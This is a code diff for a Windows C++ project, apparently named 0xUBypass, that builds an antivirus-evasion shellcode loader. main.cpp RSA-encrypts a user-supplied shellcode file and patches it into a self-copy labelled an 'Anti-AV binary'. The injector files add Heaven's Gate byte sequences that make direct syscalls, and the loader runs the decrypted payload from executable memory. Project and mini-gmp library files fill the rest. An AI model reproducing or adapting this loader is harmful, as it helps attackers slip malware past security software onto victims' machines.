44	+	0x48, 0xFF, 0xC9, // dec rcx #ProcessHandle
45	+	0x49, 0x89, 0xCA, // mov r10, rcx
46	+	0xBA, FLAT_ARRAY_DWORD(p_base_address, 0), // mov edx, #&base_address
47	+	0x41, 0xB8, 0xFF, 0xFF, 0xFE, 0x7F, // mov r8d, 0x7FFEFFFF #ZeroBits
48	+	0x41, 0xB9, FLAT_ARRAY_DWORD(p_region_size, 0), // mov r9d, #&RegionSize
49	+	0x41, 0x57, // push r15
50	+	0x49, 0xBF, FLAT_ARRAY_QWORD(fl_protect, 0), // movabs r15, #flAllocationType
51	+	0x41, 0x57, // push r15
52	+	0x49, 0xBF, FLAT_ARRAY_QWORD(fl_allocation_type, 0), // movabs r15, #flProtect
53	+	0x41, 0x57, // push r15
54	+	0x41, 0x5F, // pop r15
55	+	0x41, 0x5F, // pop r15
56	+	0x41, 0x5F, // pop r15
57	+
58	+	0xB8, 0x18, 0x00, 0x00, 0x00, // mov eax, 0x18
59	+
60	+	0x48, 0x83, 0xEC, 0x40, // sub rsp, 0x30
61	+	0x0F, 0x05, // syscall
62	+
63	+	HEAVENS_GATE_LEAVE,
64	+	FUNCTION_LEAVE,
65	+	};
66	+
67	+	InvokeShellcode(bytes_sequence, sizeof(bytes_sequence));
68	+
69	+	return (LPVOID)base_address;
70	+	}
71	+
72	+	VOID WindowsShellCodeInvoke::InvokeShellcode(UINT8* bytes_sequence, UINT32 length) {
73	+	UINT32 block_size = (length & 0xfffff000) \| ((length \| 0xfff) ? 1000 : 0);
74	+	LPVOID bytes_mem = VirtualAlloc(NULL, block_size, MEM_COMMIT \| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
75	+	memcpy_s(bytes_mem, block_size, bytes_sequence, length);
76	+	typedef void(*ShellMem)();
77	+	((ShellMem)bytes_mem)();
78	+	}

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/WindowsShellcodeInjector.h

1	+	#pragma once
2	+	#include<Windows.h>
3	+
4	+	class WindowsShellCodeInvoke {
5	+	#define HEAVENS_GAET_ENTER 0x6A, 0x33, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x83, 0x04, 0x24, 0x05, 0xCB
6	+	#define HEAVENS_GATE_LEAVE 0xE8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x04, 0x23, 0x00, 0x00, 0x00, 0x83, 0x04, 0x24, 0x0D, 0xCB, 0x66, 0x8C, 0xD8, 0x8E, 0xD0
7	+
8	+	#define FUNCTION_ENTER 0x55, 0x89, 0xE5, 0x83, 0xe4, 0xf0
9	+	#define FUNCTION_LEAVE 0x89, 0xEC, 0x5D, 0xC3
10	+
11	+	private:
12	+	typedef void (__cdecl * LPSYSCALL_FUNC)(
13	+	UINT64 shellcode,
14	+	UINT64 args1, UINT64 args2, UINT64 args3, UINT64 args4,
15	+	UINT64 args_nums,
16	+	UINT64 args_arr,
17	+	UINT32 *ret
18	+	);
19	+
20	+	LPSYSCALL_FUNC p_syscall_func;
21	+
22	+	public:
23	+	WindowsShellCodeInvoke() { }
24	+
25	+	LPVOID VirtualAllocMemory(LPVOID base, UINT32 size, UINT32 flAllocationType, UINT32 flProtect);
26	+
27	+	VOID InvokeShellcode(UINT8* bytes_sequence, UINT32 length);
28	+
29	+	protected:
30	+	void p32(UINT32, UINT8* dst);
31	+
32	+	void p64(UINT64, UINT8* dst);
33	+	};

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/WindowsShellcodeInjector.vcxproj

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup Label="ProjectConfigurations">
4	+	<ProjectConfiguration Include="Debug\|Win32">
5	+	<Configuration>Debug</Configuration>
6	+	<Platform>Win32</Platform>
7	+	</ProjectConfiguration>
8	+	<ProjectConfiguration Include="Release\|Win32">
9	+	<Configuration>Release</Configuration>
10	+	<Platform>Win32</Platform>
11	+	</ProjectConfiguration>
12	+	<ProjectConfiguration Include="Debug\|x64">
13	+	<Configuration>Debug</Configuration>
14	+	<Platform>x64</Platform>
15	+	</ProjectConfiguration>
16	+	<ProjectConfiguration Include="Release\|x64">
17	+	<Configuration>Release</Configuration>
18	+	<Platform>x64</Platform>
19	+	</ProjectConfiguration>
20	+	</ItemGroup>
21	+	<PropertyGroup Label="Globals">
22	+	<VCProjectVersion>15.0</VCProjectVersion>
23	+	<ProjectGuid>{895F5563-64DA-4642-8577-0C5AF67D8F0A}</ProjectGuid>
24	+	<Keyword>Win32Proj</Keyword>
25	+	<RootNamespace>WindowsShellcodeInjector</RootNamespace>
26	+	<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
27	+	</PropertyGroup>
28	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
29	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'" Label="Configuration">
30	+	<ConfigurationType>Application</ConfigurationType>
31	+	<UseDebugLibraries>true</UseDebugLibraries>
32	+	<PlatformToolset>v141</PlatformToolset>
33	+	<CharacterSet>Unicode</CharacterSet>
34	+	</PropertyGroup>
35	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'" Label="Configuration">
36	+	<ConfigurationType>Application</ConfigurationType>
37	+	<UseDebugLibraries>false</UseDebugLibraries>
38	+	<PlatformToolset>v141</PlatformToolset>
39	+	<WholeProgramOptimization>true</WholeProgramOptimization>
40	+	<CharacterSet>Unicode</CharacterSet>
41	+	</PropertyGroup>
42	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'" Label="Configuration">
43	+	<ConfigurationType>Application</ConfigurationType>
44	+	<UseDebugLibraries>true</UseDebugLibraries>
45	+	<PlatformToolset>v141</PlatformToolset>
46	+	<CharacterSet>Unicode</CharacterSet>
47	+	</PropertyGroup>
48	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'" Label="Configuration">
49	+	<ConfigurationType>Application</ConfigurationType>
50	+	<UseDebugLibraries>false</UseDebugLibraries>
51	+	<PlatformToolset>v141</PlatformToolset>
52	+	<WholeProgramOptimization>true</WholeProgramOptimization>
53	+	<CharacterSet>Unicode</CharacterSet>
54	+	</PropertyGroup>
55	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
56	+	<ImportGroup Label="ExtensionSettings">
57	+	</ImportGroup>
58	+	<ImportGroup Label="Shared">
59	+	</ImportGroup>
60	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
61	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
62	+	</ImportGroup>
63	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
64	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
65	+	</ImportGroup>
66	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
67	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
68	+	</ImportGroup>
69	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
70	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71	+	</ImportGroup>
72	+	<PropertyGroup Label="UserMacros" />
73	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
74	+	<LinkIncremental>true</LinkIncremental>
75	+	<IncludePath>$(IncludePath)</IncludePath>
76	+	<LibraryPath>$(LibraryPath)</LibraryPath>
77	+	</PropertyGroup>
78	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
79	+	<LinkIncremental>true</LinkIncremental>
80	+	</PropertyGroup>
81	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
82	+	<LinkIncremental>false</LinkIncremental>
83	+	</PropertyGroup>
84	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
85	+	<LinkIncremental>false</LinkIncremental>
86	+	</PropertyGroup>
87	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
88	+	<ClCompile>
89	+	<PrecompiledHeader>
90	+	</PrecompiledHeader>
91	+	<WarningLevel>Level3</WarningLevel>
92	+	<Optimization>Disabled</Optimization>
93	+	<SDLCheck>false</SDLCheck>
94	+	<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
95	+	<ConformanceMode>true</ConformanceMode>
96	+	</ClCompile>
97	+	<Link>
98	+	<SubSystem>Console</SubSystem>
99	+	<GenerateDebugInformation>true</GenerateDebugInformation>
100	+	<AdditionalDependencies>gmpxx.lib;gmp.lib;%(AdditionalDependencies)</AdditionalDependencies>
101	+	</Link>
102	+	</ItemDefinitionGroup>
103	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
104	+	<ClCompile>
105	+	<PrecompiledHeader>
106	+	</PrecompiledHeader>
107	+	<WarningLevel>Level3</WarningLevel>
108	+	<Optimization>Disabled</Optimization>
109	+	<SDLCheck>false</SDLCheck>
110	+	<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
111	+	<ConformanceMode>true</ConformanceMode>
112	+	</ClCompile>
113	+	<Link>
114	+	<SubSystem>Console</SubSystem>
115	+	<GenerateDebugInformation>true</GenerateDebugInformation>
116	+	</Link>
117	+	</ItemDefinitionGroup>
118	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
119	+	<ClCompile>
120	+	<PrecompiledHeader>
121	+	</PrecompiledHeader>
122	+	<WarningLevel>Level3</WarningLevel>
123	+	<Optimization>MaxSpeed</Optimization>
124	+	<FunctionLevelLinking>true</FunctionLevelLinking>
125	+	<IntrinsicFunctions>true</IntrinsicFunctions>
126	+	<SDLCheck>false</SDLCheck>
127	+	<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
128	+	<ConformanceMode>true</ConformanceMode>
129	+	<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
130	+	</ClCompile>
131	+	<Link>
132	+	<SubSystem>Console</SubSystem>
133	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
134	+	<OptimizeReferences>true</OptimizeReferences>
135	+	<GenerateDebugInformation>true</GenerateDebugInformation>
136	+	</Link>
137	+	</ItemDefinitionGroup>
138	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
139	+	<ClCompile>
140	+	<PrecompiledHeader>
141	+	</PrecompiledHeader>
142	+	<WarningLevel>Level3</WarningLevel>
143	+	<Optimization>MaxSpeed</Optimization>
144	+	<FunctionLevelLinking>true</FunctionLevelLinking>
145	+	<IntrinsicFunctions>true</IntrinsicFunctions>
146	+	<SDLCheck>true</SDLCheck>
147	+	<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
148	+	<ConformanceMode>true</ConformanceMode>
149	+	</ClCompile>
150	+	<Link>
151	+	<SubSystem>Console</SubSystem>
152	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
153	+	<OptimizeReferences>true</OptimizeReferences>
154	+	<GenerateDebugInformation>true</GenerateDebugInformation>
155	+	</Link>
156	+	</ItemDefinitionGroup>
157	+	<ItemGroup>
158	+	<ClCompile Include="main.cpp" />
159	+	<ClCompile Include="mini-gmp.cpp" />
160	+	<ClCompile Include="Utils.cpp" />
161	+	<ClCompile Include="RSA.cpp" />
162	+	<ClCompile Include="ShellcodeSplitor.cpp" />
163	+	<ClCompile Include="WindowsShellcodeInjector.cpp" />
164	+	</ItemGroup>
165	+	<ItemGroup>
166	+	<ClInclude Include="mini-gmp.h" />
167	+	<ClInclude Include="mini-gmpxx.h" />
168	+	<ClInclude Include="RSA.h" />
169	+	<ClInclude Include="ShellcodeSplitor.h" />
170	+	<ClInclude Include="Utils.h" />
171	+	<ClInclude Include="WindowsShellcodeInjector.h" />
172	+	</ItemGroup>
173	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
174	+	<ImportGroup Label="ExtensionTargets">
175	+	</ImportGroup>
176	+	</Project>

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/WindowsShellcodeInjector.vcxproj.filters

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup>
4	+	<Filter Include="源文件">
5	+	<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
6	+	<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
7	+	</Filter>
8	+	<Filter Include="头文件">
9	+	<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10	+	<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11	+	</Filter>
12	+	<Filter Include="资源文件">
13	+	<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14	+	<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15	+	</Filter>
16	+	</ItemGroup>
17	+	<ItemGroup>
18	+	<ClCompile Include="WindowsShellcodeInjector.cpp">
19	+	<Filter>源文件</Filter>
20	+	</ClCompile>
21	+	<ClCompile Include="ShellcodeSplitor.cpp">
22	+	<Filter>源文件</Filter>
23	+	</ClCompile>
24	+	<ClCompile Include="RSA.cpp">
25	+	<Filter>源文件</Filter>
26	+	</ClCompile>
27	+	<ClCompile Include="Utils.cpp">
28	+	<Filter>源文件</Filter>
29	+	</ClCompile>
30	+	<ClCompile Include="main.cpp">
31	+	<Filter>源文件</Filter>
32	+	</ClCompile>
33	+	<ClCompile Include="mini-gmp.cpp">
34	+	<Filter>源文件</Filter>
35	+	</ClCompile>
36	+	</ItemGroup>
37	+	<ItemGroup>
38	+	<ClInclude Include="WindowsShellcodeInjector.h">
39	+	<Filter>头文件</Filter>
40	+	</ClInclude>
41	+	<ClInclude Include="ShellcodeSplitor.h">
42	+	<Filter>头文件</Filter>
43	+	</ClInclude>
44	+	<ClInclude Include="RSA.h">
45	+	<Filter>头文件</Filter>
46	+	</ClInclude>
47	+	<ClInclude Include="Utils.h">
48	+	<Filter>头文件</Filter>
49	+	</ClInclude>
50	+	<ClInclude Include="mini-gmpxx.h">
51	+	<Filter>头文件</Filter>
52	+	</ClInclude>
53	+	<ClInclude Include="mini-gmp.h">
54	+	<Filter>头文件</Filter>
55	+	</ClInclude>
56	+	</ItemGroup>
57	+	</Project>

WindowsShellcodeInjector/libgcc_s_dw2-1.dll

Binary file.
WindowsShellcodeInjector/libgmp-10.dll

Binary file.
WindowsShellcodeInjector/libgmp-10.lib

Binary file.

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/main.cpp

1	+	#include<iostream>
2	+	#include<fstream>
3	+	#include"Utils.h"
4	+	#include"RSA.h"
5	+	#include"WindowsShellcodeInjector.h"
6	+
7	+	using namespace std;
8	+
9	+	#define MAX_ENCRYPT_SHELLCODE 4096
10	+	#define MAX_SHELLCODE 2048
11	+
12	+	#define MAGIC 0xff, 0xff, 0xdd, 0x11, 0x99, 0x10
13	+
14	+	struct ShellCode {
15	+	uint8_t shellcode[MAX_ENCRYPT_SHELLCODE] = {
16	+	MAGIC
17	+	};
18	+	uint32_t shellcode_size = 0;
19	+	uint32_t shellcode_real_size = 0;
20	+	};
21	+
22	+	ShellCode shellcode;
23	+
24	+	int seeking(char src, int size, char magic, int msize) {
25	+	int result = -1;
26	+
27	+	for (int pos = 0; pos < size - msize; pos++) {
28	+	bool success = true;
29	+	for (int i = 0; i < msize; i++) {
30	+	if (src[pos + i] != magic[i]) {
31	+	success = false;
32	+	break;
33	+	}
34	+	}
35	+	if (success) {
36	+	return pos;
37	+	}
38	+	}
39	+	return result;
40	+	}
41	+
42	+	int en(int argc, char **argv) {
43	+	if (argc != 2) {
44	+	cout << "Usage: 0xUBypass.exe [shellcode_path]" << endl
45	+	<< "shellcode_path is a relative path to the binary file contains all your shellcode";
46	+	return -1;
47	+	}
48	+
49	+	string public_key, private_key;
50	+	GenerateKey(public_key, private_key);
51	+
52	+	cout << "[*] Generated Private Key => " << private_key << endl;
53	+
54	+	ifstream input_shellcode(string("./") + argv[1], ios::in \| ios::binary);
55	+	if (!input_shellcode.is_open()) {
56	+	cout << "Failed - Make sure your shellcode file exists and readable" << endl;
57	+	return -1;
58	+	}
59	+
60	+	uint8_t tmp_shell[MAX_SHELLCODE] = { 0 };
61	+	input_shellcode.read((char *)tmp_shell, MAX_SHELLCODE);
62	+	size_t size = input_shellcode.gcount();
63	+	if (size <= 0) {
64	+	cout << "Failed - Empty shellcode file or an unexpected error occurred" << endl;
65	+	return -1;
66	+	}
67	+
68	+	//padding to ENCRYPT_BLOCK_SIZE
69	+	size = CEIL(size, (ENCRYPT_BLOCK_SIZE / 8)) * (ENCRYPT_BLOCK_SIZE / 8);
70	+
71	+	cout << "[*] Your Padding Original Shellcode Size is " << size << endl;
72	+	cout << "[*] Your Padding Encrypted Shellcode Size is " << NEEDED_ENCRYPT_LENGTH(size) << endl;
73	+	//encrypt
74	+	EncryptShell(tmp_shell, size, shellcode.shellcode, NEEDED_ENCRYPT_LENGTH(size), public_key);
75	+
76	+	cout << "[*] Your Encrypted Shellcode is ";
77	+	for (int i = 0; i < NEEDED_ENCRYPT_LENGTH(size); i++) {
78	+	printf("%02x", shellcode.shellcode[i]);
79	+	}
80	+	cout << endl;
81	+
82	+	//remove old
83	+	remove("kawaii.exe");
84	+	cout << "[*] Removed old binary file" << endl;
85	+
86	+	//copy self
87	+	ifstream exec(argv[0], ios::in \| ios::binary);
88	+	ofstream patched("kawaii.exe", ios::out \| ios::binary);
89	+
90	+	uint8_t magic_number[] = {
91	+	MAGIC
92	+	};
93	+
94	+	uint8_t buffer = (uint8_t )malloc(1024 * 1024);
95	+	memset(buffer, 0, sizeof(buffer));
96	+	exec.read((char )buffer, 1024 1024);
97	+	int p = seeking((char )buffer, exec.gcount(), (char )magic_number, sizeof(magic_number));
98	+	if (p >= 0) {
99	+	for (int i = 0; i < NEEDED_ENCRYPT_LENGTH(size); i++) {
100	+	buffer[i + p] = shellcode.shellcode[i];
101	+	}
102	+	size_t en_size = NEEDED_ENCRYPT_LENGTH(size);
103	+	size_t de_size = size;
104	+	for (int i = 0; i < 4; i++) {
105	+	buffer[p + MAX_ENCRYPT_SHELLCODE + i] = (en_size & 0xff);
106	+	en_size >>= 8;
107	+	}
108	+
109	+	for (int i = 0; i < 4; i++) {
110	+	buffer[p + MAX_ENCRYPT_SHELLCODE + 4 + i] = (de_size & 0xff);
111	+	de_size >>= 8;
112	+	}
113	+	}
114	+
115	+	patched.write((char *)buffer, exec.gcount());
116	+
117	+	cout << endl << "[*] Generated Anti-AV binary file => kawaii.exe" << endl;
118	+	cout << "[*] Usage Command => kawaii.exe " << " '" << private_key << "'" << endl;
119	+
120	+	patched.close();
121	+	exec.close();
122	+
123	+	free(buffer);
124	+	return 0;
125	+	}
126	+
127	+	int de(int argc, char **argv) {
128	+	if (argc != 2) {
129	+	return 0;
130	+	}
131	+	string key = argv[1];
132	+
133	+	WindowsShellCodeInvoke invoker;
134	+	LPVOID shell_mem = invoker.VirtualAllocMemory(NULL, 0x1000, MEM_COMMIT \| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
135	+	DecryptShell(shellcode.shellcode, shellcode.shellcode_size, (uint8_t *)shell_mem, shellcode.shellcode_real_size, key);
136	+
137	+	typedef void(*fptr)();
138	+	((fptr)shell_mem)();
139	+
140	+	return 0;
141	+	}
142	+
143	+	int main(int argc, char **argv) {
144	+	if (shellcode.shellcode_size != 0) {
145	+	return de(argc, argv);
146	+	}
147	+	return en(argc, argv);
148	+	}

WindowsShellcodeInjector/mini-gmp.cpp

Diff is too large to be displayed.

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/mini-gmp.h

1	+	/* mini-gmp, a minimalistic implementation of a GNU GMP subset.
2	+
3	+	Copyright 2011-2015 Free Software Foundation, Inc.
4	+
5	+	This file is part of the GNU MP Library.
6	+
7	+	The GNU MP Library is free software; you can redistribute it and/or modify
8	+	it under the terms of either:
9	+
10	+	* the GNU Lesser General Public License as published by the Free
11	+	Software Foundation; either version 3 of the License, or (at your
12	+	option) any later version.
13	+
14	+	or
15	+
16	+	* the GNU General Public License as published by the Free Software
17	+	Foundation; either version 2 of the License, or (at your option) any
18	+	later version.
19	+
20	+	or both in parallel, as here.
21	+
22	+	The GNU MP Library is distributed in the hope that it will be useful, but
23	+	WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
24	+	or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
25	+	for more details.
26	+
27	+	You should have received copies of the GNU General Public License and the
28	+	GNU Lesser General Public License along with the GNU MP Library. If not,
29	+	see https://www.gnu.org/licenses/. */
30	+
31	+	/* About mini-gmp: This is a minimal implementation of a subset of the
32	+	GMP interface. It is intended for inclusion into applications which
33	+	have modest bignums needs, as a fallback when the real GMP library
34	+	is not installed.
35	+
36	+	This file defines the public interface. */
37	+
38	+	#ifndef __MINI_GMP_H__
39	+	#define __MINI_GMP_H__
40	+
41	+	/* For size_t */
42	+	#include <stddef.h>
43	+	/* for CHAR_BIT */
44	+
45	+	#if defined (__cplusplus)
46	+	extern "C" {
47	+	#endif
48	+
49	+	void mp_set_memory_functions(void () (size_t),
50	+	void () (void *, size_t, size_t),
51	+	void() (void , size_t));
52	+
53	+	void mp_get_memory_functions(void (*) (size_t),
54	+	void () (void , size_t, size_t),
55	+	void(*) (void , size_t));
56	+
57	+	typedef unsigned long mp_limb_t;
58	+	typedef long mp_size_t;
59	+	typedef unsigned long mp_bitcnt_t;
60	+
61	+	typedef mp_limb_t *mp_ptr;
62	+	typedef const mp_limb_t *mp_srcptr;
63	+
64	+	typedef struct
65	+	{
66	+	int _mp_alloc; /* Number of limbs allocated and pointed
67	+	to by the _mp_d field. */
68	+	int _mp_size; /* abs(_mp_size) is the number of limbs the
69	+	last field points to. If _mp_size is
70	+	negative this is a negative number. */
71	+	mp_limb_t _mp_d; / Pointer to the limbs. */
72	+	} __mpz_struct;
73	+
74	+	typedef __mpz_struct mpz_t[1];
75	+
76	+	typedef __mpz_struct *mpz_ptr;
77	+	typedef const __mpz_struct *mpz_srcptr;
78	+
79	+	extern const int mp_bits_per_limb;
80	+
81	+	void mpn_copyi(mp_ptr, mp_srcptr, mp_size_t);
82	+	void mpn_copyd(mp_ptr, mp_srcptr, mp_size_t);
83	+	void mpn_zero(mp_ptr, mp_size_t);
84	+
85	+	int mpn_cmp(mp_srcptr, mp_srcptr, mp_size_t);
86	+	int mpn_zero_p(mp_srcptr, mp_size_t);
87	+
88	+	mp_limb_t mpn_add_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
89	+	mp_limb_t mpn_add_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t);
90	+	mp_limb_t mpn_add(mp_ptr, mp_srcptr, mp_size_t, mp_srcptr, mp_size_t);
91	+
92	+	mp_limb_t mpn_sub_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
93	+	mp_limb_t mpn_sub_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t);
94	+	mp_limb_t mpn_sub(mp_ptr, mp_srcptr, mp_size_t, mp_srcptr, mp_size_t);
95	+
96	+	mp_limb_t mpn_mul_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
97	+	mp_limb_t mpn_addmul_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
98	+	mp_limb_t mpn_submul_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
99	+
100	+	mp_limb_t mpn_mul(mp_ptr, mp_srcptr, mp_size_t, mp_srcptr, mp_size_t);
101	+	void mpn_mul_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t);
102	+	void mpn_sqr(mp_ptr, mp_srcptr, mp_size_t);
103	+	int mpn_perfect_square_p(mp_srcptr, mp_size_t);
104	+	mp_size_t mpn_sqrtrem(mp_ptr, mp_ptr, mp_srcptr, mp_size_t);
105	+
106	+	mp_limb_t mpn_lshift(mp_ptr, mp_srcptr, mp_size_t, unsigned int);
107	+	mp_limb_t mpn_rshift(mp_ptr, mp_srcptr, mp_size_t, unsigned int);
108	+
109	+	mp_bitcnt_t mpn_scan0(mp_srcptr, mp_bitcnt_t);
110	+	mp_bitcnt_t mpn_scan1(mp_srcptr, mp_bitcnt_t);
111	+
112	+	void mpn_com(mp_ptr, mp_srcptr, mp_size_t);
113	+	mp_limb_t mpn_neg(mp_ptr, mp_srcptr, mp_size_t);
114	+
115	+	mp_bitcnt_t mpn_popcount(mp_srcptr, mp_size_t);
116	+
117	+	mp_limb_t mpn_invert_3by2(mp_limb_t, mp_limb_t);
118	+	#define mpn_invert_limb(x) mpn_invert_3by2 ((x), 0)
119	+
120	+	size_t mpn_get_str(unsigned char *, int, mp_ptr, mp_size_t);
121	+	mp_size_t mpn_set_str(mp_ptr, const unsigned char *, size_t, int);
122	+
123	+	void mpz_init(mpz_t);
124	+	void mpz_init2(mpz_t, mp_bitcnt_t);
125	+	void mpz_clear(mpz_t);
126	+
127	+	#define mpz_odd_p(z) (((z)->_mp_size != 0) & (int) (z)->_mp_d[0])
128	+	#define mpz_even_p(z) (! mpz_odd_p (z))
129	+
130	+	int mpz_sgn(const mpz_t);
131	+	int mpz_cmp_si(const mpz_t, long);
132	+	int mpz_cmp_ui(const mpz_t, unsigned long);
133	+	int mpz_cmp(const mpz_t, const mpz_t);
134	+	int mpz_cmpabs_ui(const mpz_t, unsigned long);
135	+	int mpz_cmpabs(const mpz_t, const mpz_t);
136	+	int mpz_cmp_d(const mpz_t, double);
137	+	int mpz_cmpabs_d(const mpz_t, double);
138	+
139	+	void mpz_abs(mpz_t, const mpz_t);
140	+	void mpz_neg(mpz_t, const mpz_t);
141	+	void mpz_swap(mpz_t, mpz_t);
142	+
143	+	void mpz_add_ui(mpz_t, const mpz_t, unsigned long);
144	+	void mpz_add(mpz_t, const mpz_t, const mpz_t);
145	+	void mpz_sub_ui(mpz_t, const mpz_t, unsigned long);
146	+	void mpz_ui_sub(mpz_t, unsigned long, const mpz_t);
147	+	void mpz_sub(mpz_t, const mpz_t, const mpz_t);
148	+
149	+	void mpz_mul_si(mpz_t, const mpz_t, long int);
150	+	void mpz_mul_ui(mpz_t, const mpz_t, unsigned long int);
151	+	void mpz_mul(mpz_t, const mpz_t, const mpz_t);
152	+	void mpz_mul_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
153	+	void mpz_addmul_ui(mpz_t, const mpz_t, unsigned long int);
154	+	void mpz_addmul(mpz_t, const mpz_t, const mpz_t);
155	+	void mpz_submul_ui(mpz_t, const mpz_t, unsigned long int);
156	+	void mpz_submul(mpz_t, const mpz_t, const mpz_t);
157	+
158	+	void mpz_cdiv_qr(mpz_t, mpz_t, const mpz_t, const mpz_t);
159	+	void mpz_fdiv_qr(mpz_t, mpz_t, const mpz_t, const mpz_t);
160	+	void mpz_tdiv_qr(mpz_t, mpz_t, const mpz_t, const mpz_t);
161	+	void mpz_cdiv_q(mpz_t, const mpz_t, const mpz_t);
162	+	void mpz_fdiv_q(mpz_t, const mpz_t, const mpz_t);
163	+	void mpz_tdiv_q(mpz_t, const mpz_t, const mpz_t);
164	+	void mpz_cdiv_r(mpz_t, const mpz_t, const mpz_t);
165	+	void mpz_fdiv_r(mpz_t, const mpz_t, const mpz_t);
166	+	void mpz_tdiv_r(mpz_t, const mpz_t, const mpz_t);
167	+
168	+	void mpz_cdiv_q_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
169	+	void mpz_fdiv_q_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
170	+	void mpz_tdiv_q_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
171	+	void mpz_cdiv_r_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
172	+	void mpz_fdiv_r_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
173	+	void mpz_tdiv_r_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
174	+
175	+	void mpz_mod(mpz_t, const mpz_t, const mpz_t);
176	+
177	+	void mpz_divexact(mpz_t, const mpz_t, const mpz_t);
178	+
179	+	int mpz_divisible_p(const mpz_t, const mpz_t);
180	+	int mpz_congruent_p(const mpz_t, const mpz_t, const mpz_t);
181	+
182	+	unsigned long mpz_cdiv_qr_ui(mpz_t, mpz_t, const mpz_t, unsigned long);
183	+	unsigned long mpz_fdiv_qr_ui(mpz_t, mpz_t, const mpz_t, unsigned long);
184	+	unsigned long mpz_tdiv_qr_ui(mpz_t, mpz_t, const mpz_t, unsigned long);
